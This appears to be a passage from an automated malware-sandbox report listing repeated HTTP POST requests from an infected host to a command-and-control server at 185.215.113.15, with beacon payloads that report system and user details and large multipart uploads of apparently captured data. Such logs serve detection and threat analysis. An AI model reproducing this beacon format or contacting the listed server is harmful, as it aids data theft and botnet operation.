Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----73aae0f3452507fb65ee4a8da04d958aHost: 185.215.113.15Content-Length: 95763Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----902c296e891d8e76557eb09453b58741Host: 185.215.113.15Content-Length: 99573Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
